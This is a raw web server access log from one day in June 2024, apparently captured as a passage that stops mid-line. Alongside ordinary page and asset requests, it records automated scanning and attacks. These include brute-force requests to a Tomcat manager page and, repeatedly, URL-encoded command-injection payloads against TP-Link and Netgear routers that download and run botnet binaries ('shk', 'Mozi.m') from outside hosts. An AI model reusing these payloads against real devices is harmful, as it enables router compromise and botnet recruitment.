149.50.103.48 - - [23/Jun/2024:00:43:54 -0300] "GET / HTTP/1.1" 200 11237 74.82.47.56 - - [23/Jun/2024:01:33:02 -0300] "-" 400 2864 185.191.126.213 - - [23/Jun/2024:01:36:32 -0300] "GET / HTTP/1.1" 200 11237 91.238.104.236 - - [23/Jun/2024:01:44:13 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 91.92.251.254 - - [23/Jun/2024:01:56:56 -0300] "CONNECT 185.65.245.140:7227 HTTP/1.1" 501 725 198.235.24.165 - - [23/Jun/2024:02:25:41 -0300] "GET / HTTP/1.0" 200 11217 178.215.236.52 - - [23/Jun/2024:02:27:07 -0300] "CONNECT 45.61.136.175:7227 HTTP/1.1" 501 725 219.79.197.160 - - [23/Jun/2024:02:39:23 -0300] "-" 400 1986 219.79.197.160 - - [23/Jun/2024:02:39:23 -0300] "-" 400 1950 219.79.197.160 - - [23/Jun/2024:02:39:24 -0300] "CONNECT api64.ipify.org:80 HTTP/1.1" 501 725 149.50.103.48 - - [23/Jun/2024:02:44:06 -0300] "GET / HTTP/1.1" 200 11237 220.250.10.151 - - [23/Jun/2024:02:50:54 -0300] "GET / HTTP/1.1" 200 11237 45.148.10.174 - - [23/Jun/2024:02:53:06 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:02:53:07 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 180.136.232.60 - - [23/Jun/2024:02:53:54 -0300] "GET / HTTP/1.1" 200 11237 61.158.26.167 - - [23/Jun/2024:02:54:02 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 95.164.4.190 - - [23/Jun/2024:03:02:55 -0300] "GET /manager/html HTTP/1.1" 401 2499 87.121.69.27 - - [23/Jun/2024:03:05:47 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 141.98.83.197 - - [23/Jun/2024:03:10:15 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 141.98.83.197 - - [23/Jun/2024:03:10:16 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 149.50.103.48 - - [23/Jun/2024:04:44:28 -0300] "GET / HTTP/1.1" 200 11237 199.45.154.151 - - [23/Jun/2024:04:51:15 -0300] "GET / HTTP/1.1" 200 11237 199.45.154.151 - - [23/Jun/2024:04:51:20 -0300] "GET / HTTP/1.1" 200 11237 199.45.154.151 - - [23/Jun/2024:04:51:21 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 36.68.11.89 - - [23/Jun/2024:04:51:53 -0300] "GET / HTTP/1.1" 200 11237 167.94.138.39 - - [23/Jun/2024:04:53:35 -0300] "-" 400 2188 95.164.4.190 - - [23/Jun/2024:05:02:29 -0300] "GET /is_test HTTP/1.1" 404 759 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:57 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:59 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:13:59 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:00 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:01 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:01 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:01 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:01 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:02 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:02 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:02 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.190 - - [23/Jun/2024:05:14:02 -0300] "GET /manager/html HTTP/1.1" 401 2499 149.50.103.48 - - [23/Jun/2024:05:28:22 -0300] "GET / HTTP/1.1" 200 11237 83.97.73.245 - - [23/Jun/2024:05:47:41 -0300] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11237 87.236.176.87 - - [23/Jun/2024:06:02:30 -0300] "GET / HTTP/1.1" 200 11237 87.236.176.141 - - [23/Jun/2024:06:02:31 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 83.97.73.245 - - [23/Jun/2024:06:11:14 -0300] "GET /actuator/gateway/routes HTTP/1.1" 404 783 110.42.5.178 - - [23/Jun/2024:06:18:58 -0300] "GET /manager/html HTTP/1.1" 401 2499 80.76.49.130 - - [23/Jun/2024:06:26:11 -0300] "CONNECT 193.149.189.126:7227 HTTP/1.1" 501 725 87.236.176.249 - - [23/Jun/2024:06:26:57 -0300] "GET / HTTP/1.1" 200 11237 87.236.176.195 - - [23/Jun/2024:06:26:58 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 141.98.11.15 - - [23/Jun/2024:06:31:33 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 141.98.83.197 - - [23/Jun/2024:06:46:13 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 141.98.83.197 - - [23/Jun/2024:06:46:13 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:06:59:48 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:06:59:49 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 87.121.69.27 - - [23/Jun/2024:07:01:21 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 152.32.191.98 - - [23/Jun/2024:07:30:28 -0300] "-" 400 2166 152.32.191.98 - - [23/Jun/2024:07:30:39 -0300] "GET / HTTP/1.1" 200 11237 152.32.191.98 - - [23/Jun/2024:07:30:57 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 152.32.191.98 - - [23/Jun/2024:07:30:59 -0300] "GET /robots.txt HTTP/1.1" 404 727 152.32.191.98 - - [23/Jun/2024:07:30:59 -0300] "GET /sitemap.xml HTTP/1.1" 404 728 205.210.31.254 - - [23/Jun/2024:07:39:06 -0300] "-" 400 2010 205.210.31.254 - - [23/Jun/2024:07:39:06 -0300] "-" 400 2034 149.50.103.48 - - [23/Jun/2024:07:57:13 -0300] "GET / HTTP/1.1" 200 11237 118.123.105.93 - - [23/Jun/2024:08:14:03 -0300] "-" 400 1954 118.123.105.93 - - [23/Jun/2024:08:14:03 -0300] "GET / HTTP/1.1" 200 11237 118.123.105.93 - - [23/Jun/2024:08:14:04 -0300] "-" 400 2224 118.123.105.93 - - [23/Jun/2024:08:14:05 -0300] "-" 400 2200 118.123.105.93 - - [23/Jun/2024:08:14:06 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 118.123.105.93 - - [23/Jun/2024:08:14:07 -0300] "GET /robots.txt HTTP/1.1" 404 762 118.123.105.93 - - [23/Jun/2024:08:14:07 -0300] "GET /.well-known/security.txt HTTP/1.1" 404 780 87.121.69.27 - - [23/Jun/2024:08:29:24 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 149.50.103.48 - - [23/Jun/2024:09:28:07 -0300] "GET / HTTP/1.1" 200 11237 95.164.4.102 - - [23/Jun/2024:09:38:37 -0300] "GET /manager/html HTTP/1.1" 401 2499 45.148.10.174 - - [23/Jun/2024:10:07:48 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:10:07:48 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 91.219.214.131 - - [23/Jun/2024:10:08:05 -0300] "GET / HTTP/1.1" 200 11237 91.219.214.131 - - [23/Jun/2024:10:08:06 -0300] "GET /HNAP1/ HTTP/1.1" 404 762 87.121.69.27 - - [23/Jun/2024:10:15:56 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 95.164.4.102 - - [23/Jun/2024:11:12:25 -0300] "GET /is_test HTTP/1.1" 404 759 149.50.103.48 - - [23/Jun/2024:11:13:28 -0300] "GET / HTTP/1.1" 200 11237 87.236.176.32 - - [23/Jun/2024:11:20:27 -0300] "GET / HTTP/1.1" 200 11237 87.236.176.109 - - [23/Jun/2024:11:20:28 -0300] "GET /favicon.ico HTTP/1.1" 200 21630 103.206.226.74 - - [23/Jun/2024:11:24:28 -0300] "GET / HTTP/1.1" 200 11237 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:20 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:21 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:22 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:23 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:23 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:23 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:23 -0300] "GET /manager/html HTTP/1.1" 401 2499 95.164.4.102 - - [23/Jun/2024:11:30:23 -0300] "GET /manager/html HTTP/1.1" 401 2499 149.50.103.48 - - [23/Jun/2024:11:38:11 -0300] "GET / HTTP/1.1" 200 11237 94.156.8.2 - - [23/Jun/2024:11:47:02 -0300] "CONNECT 45.61.136.175:7227 HTTP/1.1" 501 725 175.107.0.111 - - [23/Jun/2024:11:51:00 -0300] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 783 87.121.69.27 - - [23/Jun/2024:12:19:10 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 141.98.83.197 - - [23/Jun/2024:12:23:21 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 141.98.83.197 - - [23/Jun/2024:12:23:21 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:12:42:21 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:12:42:21 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 80.76.49.133 - - [23/Jun/2024:12:42:35 -0300] "CONNECT 45.61.137.126:7227 HTTP/1.1" 501 725 185.191.126.213 - - [23/Jun/2024:12:55:25 -0300] "GET / HTTP/1.1" 200 11237 45.58.184.188 - - [23/Jun/2024:13:11:19 -0300] "-" 400 2864 45.58.184.188 - - [23/Jun/2024:13:11:19 -0300] "-" 400 2834 45.58.184.188 - - [23/Jun/2024:13:11:20 -0300] "GET / HTTP/1.1" 200 11237 45.58.184.188 - - [23/Jun/2024:13:11:20 -0300] "GET /download/powershell/ HTTP/1.1" 404 780 117.245.39.177 - - [23/Jun/2024:13:21:23 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.245.39.177:54663/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 761 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/login HTTP/1.1" 200 8618 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/select2-bootstrap4-theme/select2-bootstrap4.min.css HTTP/1.1" 200 6705 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.css HTTP/1.1" 200 6454 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/css/tempusdominus-bootstrap-4.min.css HTTP/1.1" 200 11967 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/select2/css/select2.min.css HTTP/1.1" 200 14966 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/icheck-bootstrap/icheck-bootstrap.min.css HTTP/1.1" 200 12505 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/css/all.min.css HTTP/1.1" 200 59305 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/css/dataTables.bootstrap4.min.css HTTP/1.1" 200 7496 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/css/responsive.bootstrap4.min.css HTTP/1.1" 200 4301 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/jqvmap/jqvmap.min.css HTTP/1.1" 200 613 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/css/buttons.bootstrap4.min.css HTTP/1.1" 200 9000 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/bs-stepper/css/bs-stepper.min.css HTTP/1.1" 200 3231 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.css HTTP/1.1" 200 8069 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/css/OverlayScrollbars.min.css HTTP/1.1" 200 20020 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.css HTTP/1.1" 200 19513 138.99.178.6 - - [23/Jun/2024:13:48:33 -0300] "GET /gestioncurso/public/plugins/select2/js/select2.full.min.js HTTP/1.1" 200 79172 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/jquery/jquery.min.js HTTP/1.1" 200 89501 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/jquery-ui/jquery-ui.min.js HTTP/1.1" 200 254921 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 200 83253 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables/jquery.dataTables.min.js HTTP/1.1" 200 87956 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/js/dataTables.bootstrap4.min.js HTTP/1.1" 200 4520 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/dataTables.responsive.min.js HTTP/1.1" 200 16849 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/responsive.bootstrap4.min.js HTTP/1.1" 200 3661 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/dataTables.buttons.min.js HTTP/1.1" 200 25183 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.bootstrap4.min.js HTTP/1.1" 200 1443 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/jszip/jszip.min.js HTTP/1.1" 200 95778 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.html5.min.js HTTP/1.1" 200 25103 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.print.min.js HTTP/1.1" 200 2514 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.colVis.min.js HTTP/1.1" 200 3198 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/sparklines/sparkline.js HTTP/1.1" 200 7219 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/jqvmap/jquery.vmap.min.js HTTP/1.1" 200 21150 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/jqvmap/maps/jquery.vmap.usa.js HTTP/1.1" 200 47712 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/jquery-knob/jquery.knob.min.js HTTP/1.1" 200 10804 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/moment/moment.min.js 